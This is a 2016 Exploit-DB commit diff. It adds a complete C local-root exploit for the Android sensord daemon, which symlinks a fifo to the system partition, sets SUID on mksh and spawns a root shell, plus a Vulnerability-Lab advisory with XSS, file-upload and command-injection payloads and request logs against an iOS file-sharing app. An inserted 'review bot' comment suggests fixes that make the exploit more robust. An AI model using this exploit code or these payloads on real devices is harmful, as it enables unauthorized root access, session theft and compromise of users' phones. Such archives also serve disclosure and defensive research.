DB: 2016-01-28
11 new exploits
parent
67dd87a6f5
commit
a5b96c2067
12 changed files with 1734 additions and 0 deletions
11
files.csv
|
@ -35573,3 +35573,14 @@ id,file,description,date,author,platform,type,port
|
|||
39329,platforms/windows/dos/39329.py,"InfraRecorder '.m3u' File Buffer Overflow Vulnerability",2014-05-25,"Osanda Malith",windows,dos,0
|
||||
39330,platforms/windows/dos/39330.txt,"Foxit Reader <= 7.2.8.1124 - PDF Parsing Memory Corruption",2016-01-26,"Francis Provencher",windows,dos,0
|
||||
39331,platforms/windows/dos/39331.pl,"Tftpd32 and Tftpd64 Denial Of Service Vulnerability",2014-05-14,j0s3h4x0r,windows,dos,0
|
||||
39332,platforms/php/webapps/39332.txt,"Wiser Backup Information Disclosure Vulnerability",2014-05-19,"AtT4CKxT3rR0r1ST ",php,webapps,0
|
||||
39333,platforms/php/webapps/39333.html,"WordPress Elegance Theme 'elegance/lib/scripts/dl-skin.php' Local File Disclosure Vulnerability",2014-06-08,"Felipe Andrian Peixoto",php,webapps,0
|
||||
39334,platforms/java/webapps/39334.txt,"Yealink VoIP Phones '/servlet' HTTP Response Splitting Vulnerability",2014-06-12,"Jesus Oquendo",java,webapps,0
|
||||
39335,platforms/ios/webapps/39335.txt,"Secure Item Hub 1.0 iOS - Multiple Vulnerabilities",2016-01-27,Vulnerability-Lab,ios,webapps,8080
|
||||
39336,platforms/linux/shellcode/39336.c,"Linux x86/x86_64 tcp_bind Shellcode",2016-01-27,B3mB4m,linux,shellcode,0
|
||||
39337,platforms/linux/shellcode/39337.c,"Linux x86/x86_64 tcp_bind Shellcode #2",2016-01-27,B3mB4m,linux,shellcode,0
|
||||
39338,platforms/linux/shellcode/39338.c,"Linux x86/x86_64 Read etc/passwd Shellcode",2016-01-27,B3mB4m,linux,shellcode,0
|
||||
39339,platforms/php/webapps/39339.txt,"BK Mobile jQuery CMS 2.4 - Multiple Vulnerabilities",2016-01-27,"Rahul Pratap Singh",php,webapps,80
|
||||
39340,platforms/android/local/39340.cpp,"Android sensord Local Root Exploit",2016-01-27,s0m3b0dy,android,local,0
|
||||
39341,platforms/php/webapps/39341.txt,"WordPress Booking Calendar Contact Form <=1.1.24 - Multiple Vulnerabilities",2016-01-27,"i0akiN SEC-LABORATORY",php,webapps,80
|
||||
39342,platforms/php/webapps/39342.txt,"WordPress Booking Calendar Contact Form<=1.1.24 - addslashes SQL Injection Vulnerability",2016-01-27,"i0akiN SEC-LABORATORY",php,webapps,80
|
||||
|
|
|
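--- a/platforms/android/local/39340.cpp
+++ b/platforms/android/local/39340.cpp
@@ -0,0 +1,474 @@
+
+/*
+* Android sensord 0day root exploit by s0m3b0dy
+* tested on LG L7 (PL)
+*
+*
+* need pentests? s0m3b0dy1(at)gmail.com
+*
+* * * * * * * * * * * * * * * * * * * * * * * *
+*
+* some Android devices have sensord deamon,
+* for some ROMs the deamon is running as root process(there we can use this exploit)
+*
+* and
+*---------
+* root@android:/ # strace sensord
+* ...
+* open("/data/misc/sensor/fifo_cmd", O_RDWR|O_LARGEFILE) = 12
+* ...
+* open("/data/misc/sensor/fifo_dat", O_RDWR|O_LARGEFILE) = 13
+* fchmod(12, 0666) = 0
+* fchmod(13, 0666) = 0
+* ---------
+* there is no check that the files are not links, so we can link it to eg. block device and make it rw!
+* exploit will set bit suid on /system/bin/mksh, need to reboot the device after step 1 and step 2
+*
+* this exploit is dangerous, before step 1 exploit is disabling auto-rotate to not overwrite /system pertition!
+*
+* the author is not responsible for any damage
+* for education purpose only :)
+*
+*/
+
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <sys/stat.h>
+#include <sys/mman.h>
+#include <dirent.h>
+#include <ctype.h>
+
+
+#define FIFO_DAT "/data/misc/sensor/fifo_dat"
+#define SH "/system/bin/mksh"
+
+struct ext4_super_block {
+/*00*/ __le32 s_inodes_count;
+__le32 s_blocks_count_lo;
+__le32 s_r_blocks_count_lo;
+__le32 s_free_blocks_count_lo;
+/*10*/ __le32 s_free_inodes_count;
+__le32 s_first_data_block;
+__le32 s_log_block_size;
+__le32 s_log_cluster_size;
+/*20*/ __le32 s_blocks_per_group;
+__le32 s_clusters_per_group;
+__le32 s_inodes_per_group;
+__le32 s_mtime;
+/*30*/ __le32 s_wtime;
+__le16 s_mnt_count;
+__le16 s_max_mnt_count;
+__le16 s_magic;
+__le16 s_state;
+__le16 s_errors;
+__le16 s_minor_rev_level;
+/*40*/ __le32 s_lastcheck;
+__le32 s_checkinterval;
+__le32 s_creator_os;
+__le32 s_rev_level;
+/*50*/ __le16 s_def_resuid;
+__le16 s_def_resgid;
+__le32 s_first_ino;
+__le16 s_inode_size;
+__le16 s_block_group_nr;
+__le32 s_feature_compat;
+/*60*/ __le32 s_feature_incompat;
+__le32 s_feature_ro_compat;
+/*68*/ __u8 s_uuid[16];
+/*78*/ char s_volume_name[16];
+/*88*/ char s_last_mounted[64];
+/*C8*/ __le32 s_algorithm_usage_bitmap;
+__u8 s_prealloc_blocks;
+__u8 s_prealloc_dir_blocks;
+__le16 s_reserved_gdt_blocks;
+/*D0*/ __u8 s_journal_uuid[16];
+/*E0*/ __le32 s_journal_inum;
+__le32 s_journal_dev;
+__le32 s_last_orphan;
+__le32 s_hash_seed[4];
+__u8 s_def_hash_version;
+__u8 s_jnl_backup_type;
+__le16 s_desc_size;
+/*100*/ __le32 s_default_mount_opts;
+__le32 s_first_meta_bg;
+__le32 s_mkfs_time;
+__le32 s_jnl_blocks[17];
+/*150*/ __le32 s_blocks_count_hi;
+__le32 s_r_blocks_count_hi;
+__le32 s_free_blocks_count_hi;
+__le16 s_min_extra_isize;
+__le16 s_want_extra_isize;
+__le32 s_flags;
+__le16 s_raid_stride;
+__le16 s_mmp_update_interval;
+__le64 s_mmp_block;
+__le32 s_raid_stripe_width;
+__u8 s_log_groups_per_flex;
+__u8 s_checksum_type;
+__u8 s_encryption_level;
+__u8 s_reserved_pad;
+__le64 s_kbytes_written;
+__le32 s_snapshot_inum;
+__le32 s_snapshot_id;
+__le64 s_snapshot_r_blocks_count;
+__le32 s_snapshot_list;
+#define EXT4_S_ERR_START offsetof(struct ext4_super_block, s_error_count)
+__le32 s_error_count;
+__le32 s_first_error_time;
+__le32 s_first_error_ino;
+__le64 s_first_error_block;
+__u8 s_first_error_func[32];
+__le32 s_first_error_line;
+__le32 s_last_error_time;
+__le32 s_last_error_ino;
+__le32 s_last_error_line;
+__le64 s_last_error_block;
+__u8 s_last_error_func[32];
+#define EXT4_S_ERR_END offsetof(struct ext4_super_block, s_mount_opts)
+__u8 s_mount_opts[64];
+__le32 s_usr_quota_inum;
+__le32 s_grp_quota_inum;
+__le32 s_overhead_clusters;
+__le32 s_backup_bgs[2];
+__u8 s_encrypt_algos[4];
+__u8 s_encrypt_pw_salt[16];
+__le32 s_lpf_ino;
+__le32 s_prj_quota_inum;
+__le32 s_checksum_seed;
+__le32 s_reserved[98];
+__le32 s_checksum;
+};
+
+struct ext4_group_desc
+{
+__le32 bg_block_bitmap_lo;
+__le32 bg_inode_bitmap_lo;
+__le32 bg_inode_table_lo;
+__le16 bg_free_blocks_count_lo;
+__le16 bg_free_inodes_count_lo;
+__le16 bg_used_dirs_count_lo;
+__le16 bg_flags;
+__le32 bg_exclude_bitmap_lo;
+__le16 bg_block_bitmap_csum_lo;
+__le16 bg_inode_bitmap_csum_lo;
+__le16 bg_itable_unused_lo;
+__le16 bg_checksum;
+__le32 bg_block_bitmap_hi;
+__le32 bg_inode_bitmap_hi;
+__le32 bg_inode_table_hi;
+__le16 bg_free_blocks_count_hi;
+__le16 bg_free_inodes_count_hi;
+__le16 bg_used_dirs_count_hi;
+__le16 bg_itable_unused_hi;
+__le32 bg_exclude_bitmap_hi;
+__le16 bg_block_bitmap_csum_hi;
+__le16 bg_inode_bitmap_csum_hi;
+__u32 bg_reserved;
+};
+
+struct ext4_inode {
+__le16 i_mode;
+__le16 i_uid;
+__le32 i_size_lo;
+__le32 i_atime;
+__le32 i_ctime;
+__le32 i_mtime;
+__le32 i_dtime;
+__le16 i_gid;
+__le16 i_links_count;
+__le32 i_blocks_lo;
+__le32 i_flags;
+union {
+struct {
+__le32 l_i_version;
+} linux1;
+struct {
+__u32 h_i_translator;
+} hurd1;
+struct {
+__u32 m_i_reserved1;
+} masix1;
+} osd1;
+__le32 i_block[15];
+__le32 i_generation;
+__le32 i_file_acl_lo;
+__le32 i_size_high;
+__le32 i_obso_faddr;
+union {
+struct {
+__le16 l_i_blocks_high;
+__le16 l_i_file_acl_high;
+__le16 l_i_uid_high;
+__le16 l_i_gid_high;
+__le16 l_i_checksum_lo;
+__le16 l_i_reserved;
+} linux2;
+struct {
+__le16 h_i_reserved1;
+__u16 h_i_mode_high;
+__u16 h_i_uid_high;
+__u16 h_i_gid_high;
+__u32 h_i_author;
+} hurd2;
+struct {
+__le16 h_i_reserved1;
+__le16 m_i_file_acl_high;
+__u32 m_i_reserved2[2];
+} masix2;
+} osd2;
+__le16 i_extra_isize;
+__le16 i_checksum_hi;
+__le32 i_ctime_extra;
+__le32 i_mtime_extra;
+__le32 i_atime_extra;
+__le32 i_crtime;
+__le32 i_crtime_extra;
+__le32 i_version_hi;
+};
+
+void print_usage( char ** argv)
+{
+printf("Have 3 steps. You need to reboot the device after step 1 and step 2.\n");
+printf("Usage: %s 1\n", argv[0]);
+printf(" %s 2\n", argv[0]);
+printf(" %s 3\n", argv[0]);
+printf(" %s verify\n", argv[0]);
+}
+
+void get_system_dev( char *ptr, int size )
+{
+int fd = open("/proc/mounts", O_RDONLY);
+int pos = 0, posend = 0, tmppos = 0;
+char buff[4096];
+char link[1024];
+memset(buff, 0, sizeof(buff));
+memset(link, 0, sizeof(link));
+memset(ptr, 0, size);
+if(fd != -1)
+{
+read(fd, &buff, sizeof(buff));
+int sres = (int)strstr(buff, " /system ");
+if( (sres != -1) && ((pos = (sres - (int)buff)) > 0) )
+{
+tmppos = pos;
+int i=0;
+while( (buff[pos] != '\n') && (pos > 0) ) pos--;
+pos++;
+strncpy(link, &buff[pos], tmppos - pos);
+readlink(link, ptr, size);
+
+}
+else
+{
+printf("[-] Can't find system partition!\n");
+close(fd);
+exit(0);
+}
+close(fd);
+}
+else
+{
+printf("[-] Can't read /proc/mounts file!\n");
+exit(0);
+}
+
+}
+
+void first_step()
+{
+if( access(FIFO_DAT, F_OK) != -1 )
+{
+unlink(FIFO_DAT);
+}
+
+
+char path[1024];
+get_system_dev(path, sizeof(path));
+symlink(path, FIFO_DAT);
+
+printf("[+] Symlink is created, please reboot device and run second step.\n[+] The device may slow down, after second step will work normally.\n");
+}
+
+void second_step()
+{
+char path[1024];
+struct stat s;
+
+unlink(FIFO_DAT);
+
+stat(SH, &s);
+printf("[+] Looking for inode no.: %llu\n", s.st_ino);
+
+get_system_dev(path, sizeof(path));
+
+int fd = open(path, O_RDWR);
+if( fd != -1 )
+{
+int inodeno = s.st_ino;
+struct ext4_super_block super;
+struct ext4_group_desc group_descr;
+struct ext4_inode inode;
+
+unsigned long int offset=0;
+lseek(fd, 0x400, SEEK_SET);
+
+read(fd, &super, sizeof(super));
+
+int block_size = 1024 << super.s_log_block_size;
+int bg = (inodeno-1) /super.s_inodes_per_group;
+
+lseek(fd, block_size + bg * (super.s_desc_size ? super.s_desc_size : sizeof(struct ext4_group_desc) ), SEEK_SET);
+read(fd, &group_descr, sizeof(group_descr));
+
+
+unsigned int index = (inodeno-1) % super.s_inodes_per_group;
+unsigned int off = index * super.s_inode_size;
+unsigned long total_offset = block_size + (group_descr.bg_inode_table_lo-1) * block_size + off;
+
+lseek(fd, total_offset, SEEK_SET);
+read(fd, &inode, sizeof(struct ext4_inode));
+
+if(inode.i_size_lo == s.st_size) {
+__le16 mode = 0;
+printf("[+] Found inode!\n");
+lseek(fd, total_offset, SEEK_SET);
+
+inode.i_mode = inode.i_mode | 0x800;
+
+int modesize = sizeof(inode.i_mode);
+int wr = write(fd, &inode.i_mode, modesize);
+
+if( wr == modesize )
+{
+printf("[+] Success, bit SUID is setted on %s\n[+] You must reboot the device to run third step\n", SH);
+}
+else
+{
+printf("[-] Can't set bit SUID on %s\n", SH);
+}
+}
+else
+{
+printf("[-] Can't find inode!\n");
+}
+close(fd);
+}
+else
+printf("[-] Can't open %s!\n", path);
+
+}
+
+void third_step()
+{
+char path[1024];
+//chmod(SH, 4755);
+setuid(0);
+setgid(0);
+if(getuid() == 0)
+{
+
+get_system_dev(path, sizeof(path));
+chmod(path, 0600);
+printf("[+] Rooted!\n");
+system(SH);
+}
+else
+{
+printf("[-] No root here!\n");
+exit(0);
+}
+}
+
+bool isSensord(char *spath)
+{
+char buff[50];
+bool res = false;
+int fd = open(spath, O_RDONLY);
+if(fd != -1)
+{
+read(fd, buff, 50);
+if(strstr(buff, "/system/bin/sensord") != NULL)
+{
+res = true;
+}
+close(fd);
+}
+return res;
+}
+
+bool verify()
+{
+DIR* dir;
+struct dirent *entry;
+char spath[512];
+bool res = false;
+struct stat s;
+
+dir = opendir("/proc");
+if(dir) {
+while ((entry = readdir(dir)) != NULL) {
+if (entry->d_type == DT_DIR) {
+snprintf(spath, 512, "/proc/%s/cmdline", entry->d_name);
+
+if (isSensord(spath)) {
+stat(spath, &s);
+if (s.st_uid == 0)
+res = true;
+
+break;
+}
+}
+}
+closedir(dir);
+}
+return res;
+}
+
+void disable_autorotate()
+{
+printf("[+] Disabling auto-rotate...\n");
+system("content insert --uri content://settings/system --bind name:s:accelerometer_rotation --bind value:i:0");
+}
+
+int main(int argc, char **argv)
+{
+
+if(argc != 2)
+{
+print_usage( argv );
+return 0;
+}
+
+if( strstr( argv[1], "1" ) != NULL) {
+if( verify() ) {
+disable_autorotate();
+first_step(); //create link
+}
+else
+{
+printf("[-] It looks likey is not vulnerable!\n");
+}
+}
+else if( strstr( argv[1], "2") != NULL) {
+second_step(); //edit ext4(/system) partition(set bit suid)
+}
+else if( strstr( argv[1], "3") != NULL) {
+third_step(); //get root shell
+}
+else if( strstr( argv[1], "verify") != NULL){
+if( verify() )
+printf("[+] Should be vulnerable!\n");
+else
+printf("[-] Not vulnerable!\n");
+}
+else{
+print_usage( argv );
+}
+
+
+
+return 0;
+}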
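Review bot: `isSensord` reads up to 50 bytes into `char buff[50]` with no room for a terminator, discards the byte count `read` returns, and then hands the buffer to `strstr`, so a `/proc/<pid>/cmdline` of 50 bytes or more, or a short read, makes `strstr` scan past the array or through uninitialised stack; bound the read and terminate it, `ssize_t n = read(fd, buff, sizeof buff - 1); if (n > 0) { buff[n] = '\0'; ... }`. `get_system_dev` has the same shape: `read` can fill all of `buff[4096]`, so the preceding `memset` no longer guarantees a terminator, the `readlink` result is neither length-checked nor NUL-terminated before `second_step` and `third_step` use `path`, and `int sres = (int)strstr(...)` is compared with `-1` although `strstr` returns NULL, so the "Can't find system partition" branch is unreachable and only the later `pos > 0` test catches the miss; `char *sres = strstr(buff, " /system "); if (sres != NULL && (pos = sres - buff) > 0)` corrects both. The file calls `memset`, `strstr` and `strncpy` without `#include <string.h>`, and the `__le32`/`__le16`/`__le64`/`__u8`/`__u16`/`__u32` field types are not declared by any header it includes, so it presumably relies on the toolchain pulling in `<linux/types.h>` transitively — worth stating explicitly. In `main`, `strstr(argv[1], "1")` accepts any argument that merely contains a `1`, so the step dispatch would be more robust as `strcmp(argv[1], "1") == 0` (likewise for `"2"`, `"3"` and `"verify"`).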
465
platforms/ios/webapps/39335.txt
Executable file
|
@ -0,0 +1,465 @@
|
|||
Document Title:
|
||||
===============
|
||||
Secure Item Hub v1.0 iOS - Multiple Web Vulnerabilities
|
||||
|
||||
|
||||
References (Source):
|
||||
====================
|
||||
http://www.vulnerability-lab.com/get_content.php?id=1682
|
||||
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2016-01-27
|
||||
|
||||
|
||||
Vulnerability Laboratory ID (VL-ID):
|
||||
====================================
|
||||
1682
|
||||
|
||||
|
||||
Common Vulnerability Scoring System:
|
||||
====================================
|
||||
7.3
|
||||
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
Transfer files to and from any computer connected to the same WiFi network as your iPhone or iPad using just a web browser! Just drag and drop
|
||||
files into the browser (requires a current version of Chrome, Firefox or Safari) and watch the files appear on your device. You can also connect
|
||||
to other iOS devices that have the Secure Item Hub app and transfer files directly between devices!
|
||||
|
||||
(Copy of the Homepage: https://itunes.apple.com/in/app/secure-item-hub-wifi-file/id537353277 )
|
||||
|
||||
|
||||
Abstract Advisory Information:
|
||||
==============================
|
||||
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the official Secure Item Hub - WiFi File Sharing mobile iOS wifi web-application.
|
||||
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
==================================
|
||||
2016-01-27: Public Disclosure (Vulnerability Laboratory)
|
||||
|
||||
|
||||
Discovery Status:
|
||||
=================
|
||||
Published
|
||||
|
||||
|
||||
Affected Product(s):
|
||||
====================
|
||||
Pinfolio LLC
|
||||
Product: Secure Item Hub - WiFi File Sharing 1.0
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Remote
|
||||
|
||||
|
||||
Severity Level:
|
||||
===============
|
||||
High
|
||||
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
1.1
|
||||
An arbitrary file upload web vulnerability has been discovered in the Secure Item Hub - WiFi File Sharing mobile iOS wifi web-application.
|
||||
The arbitrary file upload web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path
|
||||
commands to compromise the mobile web-application.
|
||||
|
||||
The web vulnerability is located in the `filename` value of the `Upload` module. Remote attackers are able to inject own files with malicious `filename`
|
||||
values in the `Upload` POST method request to compromise the mobile web-application. The local file/path include execution occcurs in the index file dir
|
||||
listing and sub folders of the wifi interface. The attacker is able to inject the lfi payload by usage of the wifi interface or the local file sync function.
|
||||
The attacker can also attach multiple file extensions to bypass the web-server file validation to execute a malicious web-shell finally. Remote attackers can
|
||||
exchange the filename with a double or tripple extension via POST method to bypass the upload validation and filter process. After the upload the attacker access
|
||||
the file with one extension and exchange it with the other one to execute for example own php codes.
|
||||
|
||||
Attackers are also able to exploit the filename issue in combination with persistent injected script code to execute different malicious attack requests.
|
||||
The attack vector is located on the application-side of the wifi service and the request method to inject is POST.
|
||||
|
||||
The security risk of the local file include vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 8.7.
|
||||
Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privileged web-application user account.
|
||||
Successful exploitation of the arbitrary file upload vulnerability results in mobile application compromise or connected device component compromise.
|
||||
|
||||
Request Method(s):
|
||||
[+] [POST]
|
||||
|
||||
Vulnerable Module(s):
|
||||
[+] Upload
|
||||
[+] Rename
|
||||
|
||||
Vulnerable Parameter(s):
|
||||
[+] filename
|
||||
[+] pairs
|
||||
|
||||
Affected Module(s):
|
||||
[+] Index File Dir Listing (http://localhost:8000/)
|
||||
|
||||
|
||||
|
||||
1.2
|
||||
A local command/path injection web vulnerabilities has been discovered in the official Secure Item Hub - WiFi File Sharing mobile iOS wifi web-application.
|
||||
The vulnerability allows attackers to inject local commands via vulnerable system values to compromise the apple mobile iOS application.
|
||||
|
||||
The vulnerability is located in the vulnerable `devicename` value that becomes visible in the `file dir (index)` module. Local attackers are able to inject own
|
||||
malicious system specific commands or path value requests in the vulnerable `devicename` value. The execution of the local command inject occurs in the `index`
|
||||
module of the mobile application. The attacker is able to manipulate the header name information of the application by preparing to change the local devicename.
|
||||
The encoding of the vulnerable values in the index header module is broken.
|
||||
|
||||
The attack vector is on the application-side and the injection requires physical device access or a local low privileged user account. Local attackers are also
|
||||
able to exploit the filename validation issue in combination with persistent injected script codes to execute different local malicious attacks requests.
|
||||
|
||||
The security risk of the local command/path inject vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 6.1.
|
||||
Exploitation of the command/path inject vulnerability requires a low privileged iOS device account with restricted access and no user interaction.
|
||||
Successful exploitation of the vulnerability results in unauthorized execution of system specific commands and unauthorized path value requests to
|
||||
compromise the mobile iOS application or the connected device components.
|
||||
|
||||
Request Method(s):
|
||||
[+] [SYNC]
|
||||
|
||||
Vulnerable Module(s):
|
||||
[+] Header Location - Web Application
|
||||
|
||||
Vulnerable Parameter(s):
|
||||
[+] devicename (HierarchyText)
|
||||
|
||||
Affected Module(s):
|
||||
[+] Index File Dir Listing (http://localhost:8000/)
|
||||
|
||||
|
||||
|
||||
|
||||
1.3
|
||||
A persistent input validation web vulnerability has been discovered in the official Secure Item Hub - WiFi File Sharing mobile iOS wifi web-application.
|
||||
The vulnerability allows remote attacker to inject malicious persistent script codes to the application-side of the mobile application.
|
||||
|
||||
The vulnerability is located in the path and name (class) values of the `New Folder` and `NewTextFile` modules. The request method to inject is POST and
|
||||
the attack vector is located on the application-side of the mobile app. Remote attackers are able to inject via POST own malicious script codes to compromise
|
||||
the wifi web-application index file dir listing. The validation and encoding of the `New Folder` and `NewTextFile` modules are broken and allows to inject
|
||||
malicious persistent script codes.
|
||||
|
||||
The security risk of the application-side web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.6.
|
||||
Exploitation of the application-side web vulnerability requires no privileged web-application user account and only low or medium user interaction.
|
||||
Successful exploitation of the vulnerabilities results in persistent phishing, session hijacking, persistent external redirect to malicious
|
||||
sources and application-side manipulation of affected or connected module context.
|
||||
|
||||
Request Method(s):
|
||||
[+] [POST]
|
||||
|
||||
Vulnerable Module(s):
|
||||
[+] NewTextFile
|
||||
[+] New Folder
|
||||
|
||||
Vulnerable Parameter(s):
|
||||
[+] path
|
||||
[+] name (class)
|
||||
|
||||
Affected Module(s):
|
||||
[+] Index File Dir Listing (http://localhost:8000/)
|
||||
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
1.1
|
||||
The arbitrary file upload web vulnerability can be exploited by remote attackers without privileged web-application user account or user interaction.
|
||||
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
|
||||
|
||||
|
||||
PoC:
|
||||
<tr><td width="20"> </td><td width="50"><input id="checkbox_0" type="checkbox"></td><td valign="top" width="70">
|
||||
<a href=">"><iframe>.png" target="_blank"><img border=0 class=thumbnail src=">"><iframe>.png"></a></td><td valign=top><div>
|
||||
<a target="_blank" class=DirectoryListingLink href="[ARBITRARY FILE UPLOAD VULNERABILITY!].png</a></div><div style="padding-top:5px;"
|
||||
class="SmallText">PNG Image | 538 bytes | modified Mo., 25. Jan., 10:44<BR>
|
||||
<span class=SmallTextButton onclick="renameItem(0);">Rename</span></div></td></tr></table></div></div>
|
||||
|
||||
|
||||
-- PoC Session Logs [POST] ---
|
||||
Status: 200[OK]
|
||||
POST http://localhost:8080/Files// Load Flags[LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[156] Mime Type[text/html]
|
||||
Request Header:
|
||||
Host[localhost:8080]
|
||||
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0]
|
||||
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
|
||||
Accept-Language[de,en-US;q=0.7,en;q=0.3]
|
||||
Accept-Encoding[gzip, deflate]
|
||||
DNT[1]
|
||||
Referer[http://localhost:8080/Files/]
|
||||
Content-Length[722]
|
||||
Content-Type[multipart/form-data; boundary=---------------------------32641154472465]
|
||||
Connection[keep-alive]
|
||||
POST-Daten:
|
||||
POST_DATA[-----------------------------32641154472465
|
||||
Content-Disposition: form-data; name="file"; filename="[ARBITRARY FILE UPLOAD VULNERABILITY!].png"
|
||||
Content-Type: image/png
|
||||
-
|
||||
Status: 200[OK]
|
||||
GET http://localhost:8080/Files/ Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[7148] Mime Type[application/x-unknown-content-type]
|
||||
Request Header:
|
||||
Host[localhost:8080]
|
||||
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0]
|
||||
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
|
||||
Accept-Language[de,en-US;q=0.7,en;q=0.3]
|
||||
Accept-Encoding[gzip, deflate]
|
||||
DNT[1]
|
||||
Referer[http://localhost:8080/]
|
||||
Connection[keep-alive]
|
||||
Cache-Control[max-age=0]
|
||||
Response Header:
|
||||
Content-Length[7148]
|
||||
Date[Mon, 25 Jan 2016 09:42:53 GMT]
|
||||
Server[Pinfolio (modified lighttpd)]
|
||||
-
|
||||
Status: 200[OK]
|
||||
POST http://localhost:8080/API/MoveItems Load Flags[LOAD_BACKGROUND LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[2] Mime Type[application/x-unknown-content-type]
|
||||
Request Header:
|
||||
Host[localhost:8080]
|
||||
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0]
|
||||
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
|
||||
Accept-Language[de,en-US;q=0.7,en;q=0.3]
|
||||
Accept-Encoding[gzip, deflate]
|
||||
DNT[1]
|
||||
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
|
||||
Referer[http://localhost:8080/Files/]
|
||||
Content-Length[39]
|
||||
Connection[keep-alive]
|
||||
POST-Daten:
|
||||
pairs[2.png%09%3E%22%3E%3Ciframe%3E.png]
|
||||
Response Header:
|
||||
Content-Length[2]
|
||||
Date[Mon, 25 Jan 2016 09:45:16 GMT]
|
||||
Server[Pinfolio (modified lighttpd)]
|
||||
-
|
||||
Status: 200[OK]
|
||||
GET http://localhost:8080/Files/ Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[7198] Mime Type[application/x-unknown-content-type]
|
||||
Request Header:
|
||||
Host[localhost:8080]
|
||||
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0]
|
||||
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
|
||||
Accept-Language[de,en-US;q=0.7,en;q=0.3]
|
||||
Accept-Encoding[gzip, deflate]
|
||||
DNT[1]
|
||||
Referer[http://localhost:8080/]
|
||||
Connection[keep-alive]
|
||||
Cache-Control[max-age=0]
|
||||
Response Header:
|
||||
Content-Length[7198]
|
||||
Date[Mon, 25 Jan 2016 09:45:18 GMT]
|
||||
Server[Pinfolio (modified lighttpd)]
|
||||
|
||||
|
||||
1.2
|
||||
The local command inject web vulnerability can be exploited by local attackers with local privileged system user account and without user interaction.
|
||||
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
|
||||
|
||||
PoC: Index - Header Information (Web-Application)
|
||||
<title>Files</title>
|
||||
</head><body>
|
||||
<table border=0 cellpadding=0 cellspacing=0 style="width:100%;margin-top:40px;">
|
||||
<tr>
|
||||
<td width=65> </td>
|
||||
<td valign=top>
|
||||
<div class="HierarchyText">
|
||||
<a href="/" class="HierarchyText"><b>ktest2 "><[COMMAND INJECT VULNERABILITY!]"></b></a> >
|
||||
<span id="hierarchy"></span>
|
||||
</div>
|
||||
<div id="title" class="Title" style="padding-top:8px;padding-bottom:30px;">Files</div>
|
||||
</td>
|
||||
<td width=200 align=right valign=top>
|
||||
<div id="signOutButtonArea" style="padding-top:20px;">
|
||||
<span onclick="signOut();" style="cursor:pointer;">Sign Out</span>
|
||||
</div>
|
||||
</td>
|
||||
<td width=65> </td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
--- PoC Session Logs [GET]---
|
||||
GET http://localhost:8080/Files/ Load Flags[LOAD_FROM_CACHE VALIDATE_NEVER LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[unbekannt]
|
||||
Request Header:
|
||||
Host[localhost:8080]
|
||||
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0]
|
||||
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
|
||||
Accept-Language[de,en-US;q=0.7,en;q=0.3]
|
||||
Accept-Encoding[gzip, deflate]
|
||||
DNT[1]
|
||||
Referer[http://localhost:8080/]
|
||||
|
||||
|
||||
|
||||
1.3
|
||||
The persistent input validation web vulnerabilities can be exploited by remote attackers without local privileged web-application user account and with low or medium user interaction.
|
||||
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
|
||||
|
||||
PoC: NewTextFile
|
||||
<tr><td width="20"> </td><td width="50"><input id="checkbox_0" type="checkbox"></td><td valign="top" width="70">
|
||||
<div style="padding-top:5px;"><img src="/Resources/img/folder-icon.png"></div></td><td valign="top"><div><a target="_self"
|
||||
class="DirectoryListingLink" href=""><iframe src="a" onload="alert("PENTEST")" <"="[PERSISTENT INEJCTED SCRIPT CODE!]">"><iframe src=a onload=alert("PENTEST") <</a></div>
|
||||
<div style="padding-top:5px;"><span class=SmallTextButton onclick="renameItem(0);">Rename</span></div></td></tr></table></div>
|
||||
|
||||
|
||||
PoC: NewTextFile
|
||||
PoC: Folder
|
||||
<td valign="top"><div><a target="_self" class="DirectoryListingLink" href="<h>xxs link
|
||||
<a>[PERSISTENT INEJCTED SCRIPT CODE!]<img src=" c"="" onerror="alert(document.domain)">"><h>xxs link</h></a><a><img src="c" onerror="alert(document.cookie)"></a></div>
|
||||
<div style="padding-top:5px;"><span class="SmallTextButton" onclick="renameItem(0);">Rename</span></div></td>
|
||||
|
||||
|
||||
--- PoC Session Logs [POST]---
|
||||
Status: 200[OK]
|
||||
